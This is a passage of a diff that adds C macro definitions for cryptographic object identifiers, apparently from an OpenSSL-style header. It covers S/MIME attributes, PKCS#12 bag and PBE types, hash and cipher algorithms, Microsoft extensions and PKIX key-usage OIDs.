+#define OBJ_id_ct_asciiTextWithCRLF		OBJ_id_smime_ct,27L
+
+#define SN_id_smime_aa_receiptRequest		"id-smime-aa-receiptRequest"
+#define NID_id_smime_aa_receiptRequest		212
+#define OBJ_id_smime_aa_receiptRequest		OBJ_id_smime_aa,1L
+
+#define SN_id_smime_aa_securityLabel		"id-smime-aa-securityLabel"
+#define NID_id_smime_aa_securityLabel		213
+#define OBJ_id_smime_aa_securityLabel		OBJ_id_smime_aa,2L
+
+#define SN_id_smime_aa_mlExpandHistory		"id-smime-aa-mlExpandHistory"
+#define NID_id_smime_aa_mlExpandHistory		214
+#define OBJ_id_smime_aa_mlExpandHistory		OBJ_id_smime_aa,3L
+
+#define SN_id_smime_aa_contentHint		"id-smime-aa-contentHint"
+#define NID_id_smime_aa_contentHint		215
+#define OBJ_id_smime_aa_contentHint		OBJ_id_smime_aa,4L
+
+#define SN_id_smime_aa_msgSigDigest		"id-smime-aa-msgSigDigest"
+#define NID_id_smime_aa_msgSigDigest		216
+#define OBJ_id_smime_aa_msgSigDigest		OBJ_id_smime_aa,5L
+
+#define SN_id_smime_aa_encapContentType		"id-smime-aa-encapContentType"
+#define NID_id_smime_aa_encapContentType		217
+#define OBJ_id_smime_aa_encapContentType		OBJ_id_smime_aa,6L
+
+#define SN_id_smime_aa_contentIdentifier		"id-smime-aa-contentIdentifier"
+#define NID_id_smime_aa_contentIdentifier		218
+#define OBJ_id_smime_aa_contentIdentifier		OBJ_id_smime_aa,7L
+
+#define SN_id_smime_aa_macValue		"id-smime-aa-macValue"
+#define NID_id_smime_aa_macValue		219
+#define OBJ_id_smime_aa_macValue		OBJ_id_smime_aa,8L
+
+#define SN_id_smime_aa_equivalentLabels		"id-smime-aa-equivalentLabels"
+#define NID_id_smime_aa_equivalentLabels		220
+#define OBJ_id_smime_aa_equivalentLabels		OBJ_id_smime_aa,9L
+
+#define SN_id_smime_aa_contentReference		"id-smime-aa-contentReference"
+#define NID_id_smime_aa_contentReference		221
+#define OBJ_id_smime_aa_contentReference		OBJ_id_smime_aa,10L
+
+#define SN_id_smime_aa_encrypKeyPref		"id-smime-aa-encrypKeyPref"
+#define NID_id_smime_aa_encrypKeyPref		222
+#define OBJ_id_smime_aa_encrypKeyPref		OBJ_id_smime_aa,11L
+
+#define SN_id_smime_aa_signingCertificate		"id-smime-aa-signingCertificate"
+#define NID_id_smime_aa_signingCertificate		223
+#define OBJ_id_smime_aa_signingCertificate		OBJ_id_smime_aa,12L
+
+#define SN_id_smime_aa_smimeEncryptCerts		"id-smime-aa-smimeEncryptCerts"
+#define NID_id_smime_aa_smimeEncryptCerts		224
+#define OBJ_id_smime_aa_smimeEncryptCerts		OBJ_id_smime_aa,13L
+
+#define SN_id_smime_aa_timeStampToken		"id-smime-aa-timeStampToken"
+#define NID_id_smime_aa_timeStampToken		225
+#define OBJ_id_smime_aa_timeStampToken		OBJ_id_smime_aa,14L
+
+#define SN_id_smime_aa_ets_sigPolicyId		"id-smime-aa-ets-sigPolicyId"
+#define NID_id_smime_aa_ets_sigPolicyId		226
+#define OBJ_id_smime_aa_ets_sigPolicyId		OBJ_id_smime_aa,15L
+
+#define SN_id_smime_aa_ets_commitmentType		"id-smime-aa-ets-commitmentType"
+#define NID_id_smime_aa_ets_commitmentType		227
+#define OBJ_id_smime_aa_ets_commitmentType		OBJ_id_smime_aa,16L
+
+#define SN_id_smime_aa_ets_signerLocation		"id-smime-aa-ets-signerLocation"
+#define NID_id_smime_aa_ets_signerLocation		228
+#define OBJ_id_smime_aa_ets_signerLocation		OBJ_id_smime_aa,17L
+
+#define SN_id_smime_aa_ets_signerAttr		"id-smime-aa-ets-signerAttr"
+#define NID_id_smime_aa_ets_signerAttr		229
+#define OBJ_id_smime_aa_ets_signerAttr		OBJ_id_smime_aa,18L
+
+#define SN_id_smime_aa_ets_otherSigCert		"id-smime-aa-ets-otherSigCert"
+#define NID_id_smime_aa_ets_otherSigCert		230
+#define OBJ_id_smime_aa_ets_otherSigCert		OBJ_id_smime_aa,19L
+
+#define SN_id_smime_aa_ets_contentTimestamp		"id-smime-aa-ets-contentTimestamp"
+#define NID_id_smime_aa_ets_contentTimestamp		231
+#define OBJ_id_smime_aa_ets_contentTimestamp		OBJ_id_smime_aa,20L
+
+#define SN_id_smime_aa_ets_CertificateRefs		"id-smime-aa-ets-CertificateRefs"
+#define NID_id_smime_aa_ets_CertificateRefs		232
+#define OBJ_id_smime_aa_ets_CertificateRefs		OBJ_id_smime_aa,21L
+
+#define SN_id_smime_aa_ets_RevocationRefs		"id-smime-aa-ets-RevocationRefs"
+#define NID_id_smime_aa_ets_RevocationRefs		233
+#define OBJ_id_smime_aa_ets_RevocationRefs		OBJ_id_smime_aa,22L
+
+#define SN_id_smime_aa_ets_certValues		"id-smime-aa-ets-certValues"
+#define NID_id_smime_aa_ets_certValues		234
+#define OBJ_id_smime_aa_ets_certValues		OBJ_id_smime_aa,23L
+
+#define SN_id_smime_aa_ets_revocationValues		"id-smime-aa-ets-revocationValues"
+#define NID_id_smime_aa_ets_revocationValues		235
+#define OBJ_id_smime_aa_ets_revocationValues		OBJ_id_smime_aa,24L
+
+#define SN_id_smime_aa_ets_escTimeStamp		"id-smime-aa-ets-escTimeStamp"
+#define NID_id_smime_aa_ets_escTimeStamp		236
+#define OBJ_id_smime_aa_ets_escTimeStamp		OBJ_id_smime_aa,25L
+
+#define SN_id_smime_aa_ets_certCRLTimestamp		"id-smime-aa-ets-certCRLTimestamp"
+#define NID_id_smime_aa_ets_certCRLTimestamp		237
+#define OBJ_id_smime_aa_ets_certCRLTimestamp		OBJ_id_smime_aa,26L
+
+#define SN_id_smime_aa_ets_archiveTimeStamp		"id-smime-aa-ets-archiveTimeStamp"
+#define NID_id_smime_aa_ets_archiveTimeStamp		238
+#define OBJ_id_smime_aa_ets_archiveTimeStamp		OBJ_id_smime_aa,27L
+
+#define SN_id_smime_aa_signatureType		"id-smime-aa-signatureType"
+#define NID_id_smime_aa_signatureType		239
+#define OBJ_id_smime_aa_signatureType		OBJ_id_smime_aa,28L
+
+#define SN_id_smime_aa_dvcs_dvc		"id-smime-aa-dvcs-dvc"
+#define NID_id_smime_aa_dvcs_dvc		240
+#define OBJ_id_smime_aa_dvcs_dvc		OBJ_id_smime_aa,29L
+
+#define SN_id_smime_alg_ESDHwith3DES		"id-smime-alg-ESDHwith3DES"
+#define NID_id_smime_alg_ESDHwith3DES		241
+#define OBJ_id_smime_alg_ESDHwith3DES		OBJ_id_smime_alg,1L
+
+#define SN_id_smime_alg_ESDHwithRC2		"id-smime-alg-ESDHwithRC2"
+#define NID_id_smime_alg_ESDHwithRC2		242
+#define OBJ_id_smime_alg_ESDHwithRC2		OBJ_id_smime_alg,2L
+
+#define SN_id_smime_alg_3DESwrap		"id-smime-alg-3DESwrap"
+#define NID_id_smime_alg_3DESwrap		243
+#define OBJ_id_smime_alg_3DESwrap		OBJ_id_smime_alg,3L
+
+#define SN_id_smime_alg_RC2wrap		"id-smime-alg-RC2wrap"
+#define NID_id_smime_alg_RC2wrap		244
+#define OBJ_id_smime_alg_RC2wrap		OBJ_id_smime_alg,4L
+
+#define SN_id_smime_alg_ESDH		"id-smime-alg-ESDH"
+#define NID_id_smime_alg_ESDH		245
+#define OBJ_id_smime_alg_ESDH		OBJ_id_smime_alg,5L
+
+#define SN_id_smime_alg_CMS3DESwrap		"id-smime-alg-CMS3DESwrap"
+#define NID_id_smime_alg_CMS3DESwrap		246
+#define OBJ_id_smime_alg_CMS3DESwrap		OBJ_id_smime_alg,6L
+
+#define SN_id_smime_alg_CMSRC2wrap		"id-smime-alg-CMSRC2wrap"
+#define NID_id_smime_alg_CMSRC2wrap		247
+#define OBJ_id_smime_alg_CMSRC2wrap		OBJ_id_smime_alg,7L
+
+#define SN_id_alg_PWRI_KEK		"id-alg-PWRI-KEK"
+#define NID_id_alg_PWRI_KEK		893
+#define OBJ_id_alg_PWRI_KEK		OBJ_id_smime_alg,9L
+
+#define SN_id_smime_cd_ldap		"id-smime-cd-ldap"
+#define NID_id_smime_cd_ldap		248
+#define OBJ_id_smime_cd_ldap		OBJ_id_smime_cd,1L
+
+#define SN_id_smime_spq_ets_sqt_uri		"id-smime-spq-ets-sqt-uri"
+#define NID_id_smime_spq_ets_sqt_uri		249
+#define OBJ_id_smime_spq_ets_sqt_uri		OBJ_id_smime_spq,1L
+
+#define SN_id_smime_spq_ets_sqt_unotice		"id-smime-spq-ets-sqt-unotice"
+#define NID_id_smime_spq_ets_sqt_unotice		250
+#define OBJ_id_smime_spq_ets_sqt_unotice		OBJ_id_smime_spq,2L
+
+#define SN_id_smime_cti_ets_proofOfOrigin		"id-smime-cti-ets-proofOfOrigin"
+#define NID_id_smime_cti_ets_proofOfOrigin		251
+#define OBJ_id_smime_cti_ets_proofOfOrigin		OBJ_id_smime_cti,1L
+
+#define SN_id_smime_cti_ets_proofOfReceipt		"id-smime-cti-ets-proofOfReceipt"
+#define NID_id_smime_cti_ets_proofOfReceipt		252
+#define OBJ_id_smime_cti_ets_proofOfReceipt		OBJ_id_smime_cti,2L
+
+#define SN_id_smime_cti_ets_proofOfDelivery		"id-smime-cti-ets-proofOfDelivery"
+#define NID_id_smime_cti_ets_proofOfDelivery		253
+#define OBJ_id_smime_cti_ets_proofOfDelivery		OBJ_id_smime_cti,3L
+
+#define SN_id_smime_cti_ets_proofOfSender		"id-smime-cti-ets-proofOfSender"
+#define NID_id_smime_cti_ets_proofOfSender		254
+#define OBJ_id_smime_cti_ets_proofOfSender		OBJ_id_smime_cti,4L
+
+#define SN_id_smime_cti_ets_proofOfApproval		"id-smime-cti-ets-proofOfApproval"
+#define NID_id_smime_cti_ets_proofOfApproval		255
+#define OBJ_id_smime_cti_ets_proofOfApproval		OBJ_id_smime_cti,5L
+
+#define SN_id_smime_cti_ets_proofOfCreation		"id-smime-cti-ets-proofOfCreation"
+#define NID_id_smime_cti_ets_proofOfCreation		256
+#define OBJ_id_smime_cti_ets_proofOfCreation		OBJ_id_smime_cti,6L
+
+#define LN_friendlyName		"friendlyName"
+#define NID_friendlyName		156
+#define OBJ_friendlyName		OBJ_pkcs9,20L
+
+#define LN_localKeyID		"localKeyID"
+#define NID_localKeyID		157
+#define OBJ_localKeyID		OBJ_pkcs9,21L
+
+#define SN_ms_csp_name		"CSPName"
+#define LN_ms_csp_name		"Microsoft CSP Name"
+#define NID_ms_csp_name		417
+#define OBJ_ms_csp_name		1L,3L,6L,1L,4L,1L,311L,17L,1L
+
+#define SN_LocalKeySet		"LocalKeySet"
+#define LN_LocalKeySet		"Microsoft Local Key set"
+#define NID_LocalKeySet		856
+#define OBJ_LocalKeySet		1L,3L,6L,1L,4L,1L,311L,17L,2L
+
+#define OBJ_certTypes		OBJ_pkcs9,22L
+
+#define LN_x509Certificate		"x509Certificate"
+#define NID_x509Certificate		158
+#define OBJ_x509Certificate		OBJ_certTypes,1L
+
+#define LN_sdsiCertificate		"sdsiCertificate"
+#define NID_sdsiCertificate		159
+#define OBJ_sdsiCertificate		OBJ_certTypes,2L
+
+#define OBJ_crlTypes		OBJ_pkcs9,23L
+
+#define LN_x509Crl		"x509Crl"
+#define NID_x509Crl		160
+#define OBJ_x509Crl		OBJ_crlTypes,1L
+
+#define OBJ_pkcs12		OBJ_pkcs,12L
+
+#define OBJ_pkcs12_pbeids		OBJ_pkcs12,1L
+
+#define SN_pbe_WithSHA1And128BitRC4		"PBE-SHA1-RC4-128"
+#define LN_pbe_WithSHA1And128BitRC4		"pbeWithSHA1And128BitRC4"
+#define NID_pbe_WithSHA1And128BitRC4		144
+#define OBJ_pbe_WithSHA1And128BitRC4		OBJ_pkcs12_pbeids,1L
+
+#define SN_pbe_WithSHA1And40BitRC4		"PBE-SHA1-RC4-40"
+#define LN_pbe_WithSHA1And40BitRC4		"pbeWithSHA1And40BitRC4"
+#define NID_pbe_WithSHA1And40BitRC4		145
+#define OBJ_pbe_WithSHA1And40BitRC4		OBJ_pkcs12_pbeids,2L
+
+#define SN_pbe_WithSHA1And3_Key_TripleDES_CBC		"PBE-SHA1-3DES"
+#define LN_pbe_WithSHA1And3_Key_TripleDES_CBC		"pbeWithSHA1And3-KeyTripleDES-CBC"
+#define NID_pbe_WithSHA1And3_Key_TripleDES_CBC		146
+#define OBJ_pbe_WithSHA1And3_Key_TripleDES_CBC		OBJ_pkcs12_pbeids,3L
+
+#define SN_pbe_WithSHA1And2_Key_TripleDES_CBC		"PBE-SHA1-2DES"
+#define LN_pbe_WithSHA1And2_Key_TripleDES_CBC		"pbeWithSHA1And2-KeyTripleDES-CBC"
+#define NID_pbe_WithSHA1And2_Key_TripleDES_CBC		147
+#define OBJ_pbe_WithSHA1And2_Key_TripleDES_CBC		OBJ_pkcs12_pbeids,4L
+
+#define SN_pbe_WithSHA1And128BitRC2_CBC		"PBE-SHA1-RC2-128"
+#define LN_pbe_WithSHA1And128BitRC2_CBC		"pbeWithSHA1And128BitRC2-CBC"
+#define NID_pbe_WithSHA1And128BitRC2_CBC		148
+#define OBJ_pbe_WithSHA1And128BitRC2_CBC		OBJ_pkcs12_pbeids,5L
+
+#define SN_pbe_WithSHA1And40BitRC2_CBC		"PBE-SHA1-RC2-40"
+#define LN_pbe_WithSHA1And40BitRC2_CBC		"pbeWithSHA1And40BitRC2-CBC"
+#define NID_pbe_WithSHA1And40BitRC2_CBC		149
+#define OBJ_pbe_WithSHA1And40BitRC2_CBC		OBJ_pkcs12_pbeids,6L
+
+#define OBJ_pkcs12_Version1		OBJ_pkcs12,10L
+
+#define OBJ_pkcs12_BagIds		OBJ_pkcs12_Version1,1L
+
+#define LN_keyBag		"keyBag"
+#define NID_keyBag		150
+#define OBJ_keyBag		OBJ_pkcs12_BagIds,1L
+
+#define LN_pkcs8ShroudedKeyBag		"pkcs8ShroudedKeyBag"
+#define NID_pkcs8ShroudedKeyBag		151
+#define OBJ_pkcs8ShroudedKeyBag		OBJ_pkcs12_BagIds,2L
+
+#define LN_certBag		"certBag"
+#define NID_certBag		152
+#define OBJ_certBag		OBJ_pkcs12_BagIds,3L
+
+#define LN_crlBag		"crlBag"
+#define NID_crlBag		153
+#define OBJ_crlBag		OBJ_pkcs12_BagIds,4L
+
+#define LN_secretBag		"secretBag"
+#define NID_secretBag		154
+#define OBJ_secretBag		OBJ_pkcs12_BagIds,5L
+
+#define LN_safeContentsBag		"safeContentsBag"
+#define NID_safeContentsBag		155
+#define OBJ_safeContentsBag		OBJ_pkcs12_BagIds,6L
+
+#define SN_md2		"MD2"
+#define LN_md2		"md2"
+#define NID_md2		3
+#define OBJ_md2		OBJ_rsadsi,2L,2L
+
+#define SN_md4		"MD4"
+#define LN_md4		"md4"
+#define NID_md4		257
+#define OBJ_md4		OBJ_rsadsi,2L,4L
+
+#define SN_md5		"MD5"
+#define LN_md5		"md5"
+#define NID_md5		4
+#define OBJ_md5		OBJ_rsadsi,2L,5L
+
+#define SN_md5_sha1		"MD5-SHA1"
+#define LN_md5_sha1		"md5-sha1"
+#define NID_md5_sha1		114
+
+#define LN_hmacWithMD5		"hmacWithMD5"
+#define NID_hmacWithMD5		797
+#define OBJ_hmacWithMD5		OBJ_rsadsi,2L,6L
+
+#define LN_hmacWithSHA1		"hmacWithSHA1"
+#define NID_hmacWithSHA1		163
+#define OBJ_hmacWithSHA1		OBJ_rsadsi,2L,7L
+
+#define LN_hmacWithSHA224		"hmacWithSHA224"
+#define NID_hmacWithSHA224		798
+#define OBJ_hmacWithSHA224		OBJ_rsadsi,2L,8L
+
+#define LN_hmacWithSHA256		"hmacWithSHA256"
+#define NID_hmacWithSHA256		799
+#define OBJ_hmacWithSHA256		OBJ_rsadsi,2L,9L
+
+#define LN_hmacWithSHA384		"hmacWithSHA384"
+#define NID_hmacWithSHA384		800
+#define OBJ_hmacWithSHA384		OBJ_rsadsi,2L,10L
+
+#define LN_hmacWithSHA512		"hmacWithSHA512"
+#define NID_hmacWithSHA512		801
+#define OBJ_hmacWithSHA512		OBJ_rsadsi,2L,11L
+
+#define SN_rc2_cbc		"RC2-CBC"
+#define LN_rc2_cbc		"rc2-cbc"
+#define NID_rc2_cbc		37
+#define OBJ_rc2_cbc		OBJ_rsadsi,3L,2L
+
+#define SN_rc2_ecb		"RC2-ECB"
+#define LN_rc2_ecb		"rc2-ecb"
+#define NID_rc2_ecb		38
+
+#define SN_rc2_cfb64		"RC2-CFB"
+#define LN_rc2_cfb64		"rc2-cfb"
+#define NID_rc2_cfb64		39
+
+#define SN_rc2_ofb64		"RC2-OFB"
+#define LN_rc2_ofb64		"rc2-ofb"
+#define NID_rc2_ofb64		40
+
+#define SN_rc2_40_cbc		"RC2-40-CBC"
+#define LN_rc2_40_cbc		"rc2-40-cbc"
+#define NID_rc2_40_cbc		98
+
+#define SN_rc2_64_cbc		"RC2-64-CBC"
+#define LN_rc2_64_cbc		"rc2-64-cbc"
+#define NID_rc2_64_cbc		166
+
+#define SN_rc4		"RC4"
+#define LN_rc4		"rc4"
+#define NID_rc4		5
+#define OBJ_rc4		OBJ_rsadsi,3L,4L
+
+#define SN_rc4_40		"RC4-40"
+#define LN_rc4_40		"rc4-40"
+#define NID_rc4_40		97
+
+#define SN_des_ede3_cbc		"DES-EDE3-CBC"
+#define LN_des_ede3_cbc		"des-ede3-cbc"
+#define NID_des_ede3_cbc		44
+#define OBJ_des_ede3_cbc		OBJ_rsadsi,3L,7L
+
+#define SN_rc5_cbc		"RC5-CBC"
+#define LN_rc5_cbc		"rc5-cbc"
+#define NID_rc5_cbc		120
+#define OBJ_rc5_cbc		OBJ_rsadsi,3L,8L
+
+#define SN_rc5_ecb		"RC5-ECB"
+#define LN_rc5_ecb		"rc5-ecb"
+#define NID_rc5_ecb		121
+
+#define SN_rc5_cfb64		"RC5-CFB"
+#define LN_rc5_cfb64		"rc5-cfb"
+#define NID_rc5_cfb64		122
+
+#define SN_rc5_ofb64		"RC5-OFB"
+#define LN_rc5_ofb64		"rc5-ofb"
+#define NID_rc5_ofb64		123
+
+#define SN_ms_ext_req		"msExtReq"
+#define LN_ms_ext_req		"Microsoft Extension Request"
+#define NID_ms_ext_req		171
+#define OBJ_ms_ext_req		1L,3L,6L,1L,4L,1L,311L,2L,1L,14L
+
+#define SN_ms_code_ind		"msCodeInd"
+#define LN_ms_code_ind		"Microsoft Individual Code Signing"
+#define NID_ms_code_ind		134
+#define OBJ_ms_code_ind		1L,3L,6L,1L,4L,1L,311L,2L,1L,21L
+
+#define SN_ms_code_com		"msCodeCom"
+#define LN_ms_code_com		"Microsoft Commercial Code Signing"
+#define NID_ms_code_com		135
+#define OBJ_ms_code_com		1L,3L,6L,1L,4L,1L,311L,2L,1L,22L
+
+#define SN_ms_ctl_sign		"msCTLSign"
+#define LN_ms_ctl_sign		"Microsoft Trust List Signing"
+#define NID_ms_ctl_sign		136
+#define OBJ_ms_ctl_sign		1L,3L,6L,1L,4L,1L,311L,10L,3L,1L
+
+#define SN_ms_sgc		"msSGC"
+#define LN_ms_sgc		"Microsoft Server Gated Crypto"
+#define NID_ms_sgc		137
+#define OBJ_ms_sgc		1L,3L,6L,1L,4L,1L,311L,10L,3L,3L
+
+#define SN_ms_efs		"msEFS"
+#define LN_ms_efs		"Microsoft Encrypted File System"
+#define NID_ms_efs		138
+#define OBJ_ms_efs		1L,3L,6L,1L,4L,1L,311L,10L,3L,4L
+
+#define SN_ms_smartcard_login		"msSmartcardLogin"
+#define LN_ms_smartcard_login		"Microsoft Smartcardlogin"
+#define NID_ms_smartcard_login		648
+#define OBJ_ms_smartcard_login		1L,3L,6L,1L,4L,1L,311L,20L,2L,2L
+
+#define SN_ms_upn		"msUPN"
+#define LN_ms_upn		"Microsoft Universal Principal Name"
+#define NID_ms_upn		649
+#define OBJ_ms_upn		1L,3L,6L,1L,4L,1L,311L,20L,2L,3L
+
+#define SN_idea_cbc		"IDEA-CBC"
+#define LN_idea_cbc		"idea-cbc"
+#define NID_idea_cbc		34
+#define OBJ_idea_cbc		1L,3L,6L,1L,4L,1L,188L,7L,1L,1L,2L
+
+#define SN_idea_ecb		"IDEA-ECB"
+#define LN_idea_ecb		"idea-ecb"
+#define NID_idea_ecb		36
+
+#define SN_idea_cfb64		"IDEA-CFB"
+#define LN_idea_cfb64		"idea-cfb"
+#define NID_idea_cfb64		35
+
+#define SN_idea_ofb64		"IDEA-OFB"
+#define LN_idea_ofb64		"idea-ofb"
+#define NID_idea_ofb64		46
+
+#define SN_bf_cbc		"BF-CBC"
+#define LN_bf_cbc		"bf-cbc"
+#define NID_bf_cbc		91
+#define OBJ_bf_cbc		1L,3L,6L,1L,4L,1L,3029L,1L,2L
+
+#define SN_bf_ecb		"BF-ECB"
+#define LN_bf_ecb		"bf-ecb"
+#define NID_bf_ecb		92
+
+#define SN_bf_cfb64		"BF-CFB"
+#define LN_bf_cfb64		"bf-cfb"
+#define NID_bf_cfb64		93
+
+#define SN_bf_ofb64		"BF-OFB"
+#define LN_bf_ofb64		"bf-ofb"
+#define NID_bf_ofb64		94
+
+#define SN_id_pkix		"PKIX"
+#define NID_id_pkix		127
+#define OBJ_id_pkix		1L,3L,6L,1L,5L,5L,7L
+
+#define SN_id_pkix_mod		"id-pkix-mod"
+#define NID_id_pkix_mod		258
+#define OBJ_id_pkix_mod		OBJ_id_pkix,0L
+
+#define SN_id_pe		"id-pe"
+#define NID_id_pe		175
+#define OBJ_id_pe		OBJ_id_pkix,1L
+
+#define SN_id_qt		"id-qt"
+#define NID_id_qt		259
+#define OBJ_id_qt		OBJ_id_pkix,2L
+
+#define SN_id_kp		"id-kp"
+#define NID_id_kp		128
+#define OBJ_id_kp		OBJ_id_pkix,3L
+
+#define SN_id_it		"id-it"
+#define NID_id_it		260
+#define OBJ_id_it		OBJ_id_pkix,4L
+
+#define SN_id_pkip		"id-pkip"
+#define NID_id_pkip		261
+#define OBJ_id_pkip		OBJ_id_pkix,5L
+
+#define SN_id_alg		"id-alg"
+#define NID_id_alg		262
+#define OBJ_id_alg		OBJ_id_pkix,6L
+
+#define SN_id_cmc		"id-cmc"
+#define NID_id_cmc		263
+#define OBJ_id_cmc		OBJ_id_pkix,7L
+
+#define SN_id_on		"id-on"
+#define NID_id_on		264
+#define OBJ_id_on		OBJ_id_pkix,8L
+
+#define SN_id_pda		"id-pda"
+#define NID_id_pda		265
+#define OBJ_id_pda		OBJ_id_pkix,9L
+
+#define SN_id_aca		"id-aca"
+#define NID_id_aca		266
+#define OBJ_id_aca		OBJ_id_pkix,10L
+
+#define SN_id_qcs		"id-qcs"
+#define NID_id_qcs		267
+#define OBJ_id_qcs		OBJ_id_pkix,11L
+
+#define SN_id_cct		"id-cct"
+#define NID_id_cct		268
+#define OBJ_id_cct		OBJ_id_pkix,12L
+
+#define SN_id_ppl		"id-ppl"
+#define NID_id_ppl		662
+#define OBJ_id_ppl		OBJ_id_pkix,21L
+
+#define SN_id_ad		"id-ad"
+#define NID_id_ad		176
+#define OBJ_id_ad		OBJ_id_pkix,48L
+
+#define SN_id_pkix1_explicit_88		"id-pkix1-explicit-88"
+#define NID_id_pkix1_explicit_88		269
+#define OBJ_id_pkix1_explicit_88		OBJ_id_pkix_mod,1L
+
+#define SN_id_pkix1_implicit_88		"id-pkix1-implicit-88"
+#define NID_id_pkix1_implicit_88		270
+#define OBJ_id_pkix1_implicit_88		OBJ_id_pkix_mod,2L
+
+#define SN_id_pkix1_explicit_93		"id-pkix1-explicit-93"
+#define NID_id_pkix1_explicit_93		271
+#define OBJ_id_pkix1_explicit_93		OBJ_id_pkix_mod,3L
+
+#define SN_id_pkix1_implicit_93		"id-pkix1-implicit-93"
+#define NID_id_pkix1_implicit_93		272
+#define OBJ_id_pkix1_implicit_93		OBJ_id_pkix_mod,4L
+
+#define SN_id_mod_crmf		"id-mod-crmf"
+#define NID_id_mod_crmf		273
+#define OBJ_id_mod_crmf		OBJ_id_pkix_mod,5L
+
+#define SN_id_mod_cmc		"id-mod-cmc"
+#define NID_id_mod_cmc		274
+#define OBJ_id_mod_cmc		OBJ_id_pkix_mod,6L
+
+#define SN_id_mod_kea_profile_88		"id-mod-kea-profile-88"
+#define NID_id_mod_kea_profile_88		275
+#define OBJ_id_mod_kea_profile_88		OBJ_id_pkix_mod,7L
+
+#define SN_id_mod_kea_profile_93		"id-mod-kea-profile-93"
+#define NID_id_mod_kea_profile_93		276
+#define OBJ_id_mod_kea_profile_93		OBJ_id_pkix_mod,8L
+
+#define SN_id_mod_cmp		"id-mod-cmp"
+#define NID_id_mod_cmp		277
+#define OBJ_id_mod_cmp		OBJ_id_pkix_mod,9L
+
+#define SN_id_mod_qualified_cert_88		"id-mod-qualified-cert-88"
+#define NID_id_mod_qualified_cert_88		278
+#define OBJ_id_mod_qualified_cert_88		OBJ_id_pkix_mod,10L
+
+#define SN_id_mod_qualified_cert_93		"id-mod-qualified-cert-93"
+#define NID_id_mod_qualified_cert_93		279
+#define OBJ_id_mod_qualified_cert_93		OBJ_id_pkix_mod,11L
+
+#define SN_id_mod_attribute_cert		"id-mod-attribute-cert"
+#define NID_id_mod_attribute_cert		280
+#define OBJ_id_mod_attribute_cert		OBJ_id_pkix_mod,12L
+
+#define SN_id_mod_timestamp_protocol		"id-mod-timestamp-protocol"
+#define NID_id_mod_timestamp_protocol		281
+#define OBJ_id_mod_timestamp_protocol		OBJ_id_pkix_mod,13L
+
+#define SN_id_mod_ocsp		"id-mod-ocsp"
+#define NID_id_mod_ocsp		282
+#define OBJ_id_mod_ocsp		OBJ_id_pkix_mod,14L
+
+#define SN_id_mod_dvcs		"id-mod-dvcs"
+#define NID_id_mod_dvcs		283
+#define OBJ_id_mod_dvcs		OBJ_id_pkix_mod,15L
+
+#define SN_id_mod_cmp2000		"id-mod-cmp2000"
+#define NID_id_mod_cmp2000		284
+#define OBJ_id_mod_cmp2000		OBJ_id_pkix_mod,16L
+
+#define SN_info_access		"authorityInfoAccess"
+#define LN_info_access		"Authority Information Access"
+#define NID_info_access		177
+#define OBJ_info_access		OBJ_id_pe,1L
+
+#define SN_biometricInfo		"biometricInfo"
+#define LN_biometricInfo		"Biometric Info"
+#define NID_biometricInfo		285
+#define OBJ_biometricInfo		OBJ_id_pe,2L
+
+#define SN_qcStatements		"qcStatements"
+#define NID_qcStatements		286
+#define OBJ_qcStatements		OBJ_id_pe,3L
+
+#define SN_ac_auditEntity		"ac-auditEntity"
+#define NID_ac_auditEntity		287
+#define OBJ_ac_auditEntity		OBJ_id_pe,4L
+
+#define SN_ac_targeting		"ac-targeting"
+#define NID_ac_targeting		288
+#define OBJ_ac_targeting		OBJ_id_pe,5L
+
+#define SN_aaControls		"aaControls"
+#define NID_aaControls		289
+#define OBJ_aaControls		OBJ_id_pe,6L
+
+#define SN_sbgp_ipAddrBlock		"sbgp-ipAddrBlock"
+#define NID_sbgp_ipAddrBlock		290
+#define OBJ_sbgp_ipAddrBlock		OBJ_id_pe,7L
+
+#define SN_sbgp_autonomousSysNum		"sbgp-autonomousSysNum"
+#define NID_sbgp_autonomousSysNum		291
+#define OBJ_sbgp_autonomousSysNum		OBJ_id_pe,8L
+
+#define SN_sbgp_routerIdentifier		"sbgp-routerIdentifier"
+#define NID_sbgp_routerIdentifier		292
+#define OBJ_sbgp_routerIdentifier		OBJ_id_pe,9L
+
+#define SN_ac_proxying		"ac-proxying"
+#define NID_ac_proxying		397
+#define OBJ_ac_proxying		OBJ_id_pe,10L
+
+#define SN_sinfo_access		"subjectInfoAccess"
+#define LN_sinfo_access		"Subject Information Access"
+#define NID_sinfo_access		398
+#define OBJ_sinfo_access		OBJ_id_pe,11L
+
+#define SN_proxyCertInfo		"proxyCertInfo"
+#define LN_proxyCertInfo		"Proxy Certificate Information"
+#define NID_proxyCertInfo		663
+#define OBJ_proxyCertInfo		OBJ_id_pe,14L
+
+#define SN_id_qt_cps		"id-qt-cps"
+#define LN_id_qt_cps		"Policy Qualifier CPS"
+#define NID_id_qt_cps		164
+#define OBJ_id_qt_cps		OBJ_id_qt,1L
+
+#define SN_id_qt_unotice		"id-qt-unotice"
+#define LN_id_qt_unotice		"Policy Qualifier User Notice"
+#define NID_id_qt_unotice		165
+#define OBJ_id_qt_unotice		OBJ_id_qt,2L
+
+#define SN_textNotice		"textNotice"
+#define NID_textNotice		293
+#define OBJ_textNotice		OBJ_id_qt,3L
+
+#define SN_server_auth		"serverAuth"
+#define LN_server_auth		"TLS Web Server Authentication"
+#define NID_server_auth		129
+#define OBJ_server_auth		OBJ_id_kp,1L
+
+#define SN_client_auth		"clientAuth"
+#define LN_client_auth		"TLS Web Client Authentication"
+#define NID_client_auth		130
+#define OBJ_client_auth		OBJ_id_kp,2L
+
+#define SN_code_sign		"codeSigning"
+#define LN_code_sign		"Code Signing"
+#define NID_code_sign		131
+#define OBJ_code_sign		OBJ_id_kp,3L
+
+#define SN_email_protect		"emailProtection"
+#define LN_email_protect		"E-mail Protection"
+#define NID_email_protect		132
+#define OBJ_email_protect		OBJ_id_kp,4L
+
+#define SN_ipsecEndSystem		"ipsecEndSystem"
+#define LN_ipsecEndSystem		"IPSec End System"
+#define NID_ipsecEndSystem		294
+#define OBJ_ipsecEndSystem		OBJ_id_kp,5L
+
+#define SN_ipsecTunnel		"ipsecTunnel"
+#define LN_ipsecTunnel		"IPSec Tunnel"
+#define NID_ipsecTunnel		295
+#define OBJ_ipsecTunnel		OBJ_id_kp,6L
+
+#define SN_ipsecUser		"ipsecUser"
+#define LN_ipsecUser		"IPSec User"
+#define NID_ipsecUser		296
+#define OBJ_ipsecUser		OBJ_id_kp,7L
+
+#define SN_time_stamp		"timeStamping"
+#define LN_time_stamp		"Time Stamping"
+#define NID_time_stamp		133
+#define OBJ_time_stamp		OBJ_id_kp,8L
